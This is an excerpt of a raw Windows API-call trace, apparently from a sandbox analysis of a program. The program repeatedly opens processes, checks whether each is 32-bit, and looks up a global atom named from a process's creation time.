	[0117.202] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.202] CloseHandle (hObject=0x698) returned 1
	[0117.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.202] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.202] CloseHandle (hObject=0x698) returned 1
	[0117.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.202] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.202] CloseHandle (hObject=0x698) returned 1
	[0117.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.202] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.203] CloseHandle (hObject=0x698) returned 1
	[0117.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.203] CloseHandle (hObject=0x698) returned 1
	[0117.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.203] CloseHandle (hObject=0x698) returned 1
	[0117.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.203] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.203] CloseHandle (hObject=0x698) returned 1
	[0117.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.204] CloseHandle (hObject=0x698) returned 1
	[0117.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.204] CloseHandle (hObject=0x698) returned 1
	[0117.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.204] CloseHandle (hObject=0x698) returned 1
	[0117.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.204] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.204] CloseHandle (hObject=0x698) returned 1
	[0117.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.205] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.205] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.205] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.205] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.206] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.207] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.207] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.207] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.207] CloseHandle (hObject=0x698) returned 1
	[0117.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.207] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.207] CloseHandle (hObject=0x698) returned 1
	[0117.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.207] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.207] CloseHandle (hObject=0x698) returned 1
	[0117.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.207] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.207] CloseHandle (hObject=0x698) returned 1
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.243] CloseHandle (hObject=0x698) returned 1
	[0117.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.243] CloseHandle (hObject=0x698) returned 1
	[0117.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.243] CloseHandle (hObject=0x698) returned 1
	[0117.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.244] CloseHandle (hObject=0x698) returned 1
	[0117.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.244] CloseHandle (hObject=0x698) returned 1
	[0117.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.244] CloseHandle (hObject=0x698) returned 1
	[0117.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.245] CloseHandle (hObject=0x698) returned 1
	[0117.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.245] CloseHandle (hObject=0x698) returned 1
	[0117.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.245] CloseHandle (hObject=0x698) returned 1
	[0117.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.246] CloseHandle (hObject=0x698) returned 1
	[0117.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.246] CloseHandle (hObject=0x698) returned 1
	[0117.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.246] CloseHandle (hObject=0x698) returned 1
	[0117.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.246] CloseHandle (hObject=0x698) returned 1
	[0117.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.246] CloseHandle (hObject=0x698) returned 1
	[0117.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.247] CloseHandle (hObject=0x698) returned 1
	[0117.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.247] CloseHandle (hObject=0x698) returned 1
	[0117.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.247] CloseHandle (hObject=0x698) returned 1
	[0117.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.247] CloseHandle (hObject=0x698) returned 1
	[0117.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.248] CloseHandle (hObject=0x698) returned 1
	[0117.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.248] CloseHandle (hObject=0x698) returned 1
	[0117.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.248] CloseHandle (hObject=0x698) returned 1
	[0117.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.248] CloseHandle (hObject=0x698) returned 1
	[0117.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.248] CloseHandle (hObject=0x698) returned 1
	[0117.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.249] CloseHandle (hObject=0x698) returned 1
	[0117.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.249] CloseHandle (hObject=0x698) returned 1
	[0117.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.249] CloseHandle (hObject=0x698) returned 1
	[0117.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.249] CloseHandle (hObject=0x698) returned 1
	[0117.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.250] CloseHandle (hObject=0x698) returned 1
	[0117.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.250] CloseHandle (hObject=0x698) returned 1
	[0117.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.250] CloseHandle (hObject=0x698) returned 1
	[0117.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.250] CloseHandle (hObject=0x698) returned 1
	[0117.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.251] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.251] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.251] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.251] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.252] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.252] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.252] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.252] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.252] CloseHandle (hObject=0x698) returned 1
	[0117.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.252] CloseHandle (hObject=0x698) returned 1
	[0117.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.252] CloseHandle (hObject=0x698) returned 1
	[0117.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.253] CloseHandle (hObject=0x698) returned 1
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.333] CloseHandle (hObject=0x698) returned 1
	[0117.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.333] CloseHandle (hObject=0x698) returned 1
	[0117.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.334] CloseHandle (hObject=0x698) returned 1
	[0117.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.334] CloseHandle (hObject=0x698) returned 1
	[0117.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.334] CloseHandle (hObject=0x698) returned 1
	[0117.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.334] CloseHandle (hObject=0x698) returned 1
	[0117.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.334] CloseHandle (hObject=0x698) returned 1
	[0117.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.335] CloseHandle (hObject=0x698) returned 1
	[0117.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.335] CloseHandle (hObject=0x698) returned 1
	[0117.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.335] CloseHandle (hObject=0x698) returned 1
	[0117.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.336] CloseHandle (hObject=0x698) returned 1
	[0117.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.336] CloseHandle (hObject=0x698) returned 1
	[0117.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.336] CloseHandle (hObject=0x698) returned 1
	[0117.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.336] CloseHandle (hObject=0x698) returned 1
	[0117.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.336] CloseHandle (hObject=0x698) returned 1
	[0117.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.337] CloseHandle (hObject=0x698) returned 1
	[0117.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.337] CloseHandle (hObject=0x698) returned 1
	[0117.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.337] CloseHandle (hObject=0x698) returned 1
	[0117.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.338] CloseHandle (hObject=0x698) returned 1
	[0117.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.338] CloseHandle (hObject=0x698) returned 1
	[0117.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.338] CloseHandle (hObject=0x698) returned 1
	[0117.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.338] CloseHandle (hObject=0x698) returned 1
	[0117.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.339] CloseHandle (hObject=0x698) returned 1
	[0117.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.339] CloseHandle (hObject=0x698) returned 1
	[0117.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.339] CloseHandle (hObject=0x698) returned 1
	[0117.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.339] CloseHandle (hObject=0x698) returned 1
	[0117.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.339] CloseHandle (hObject=0x698) returned 1
	[0117.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
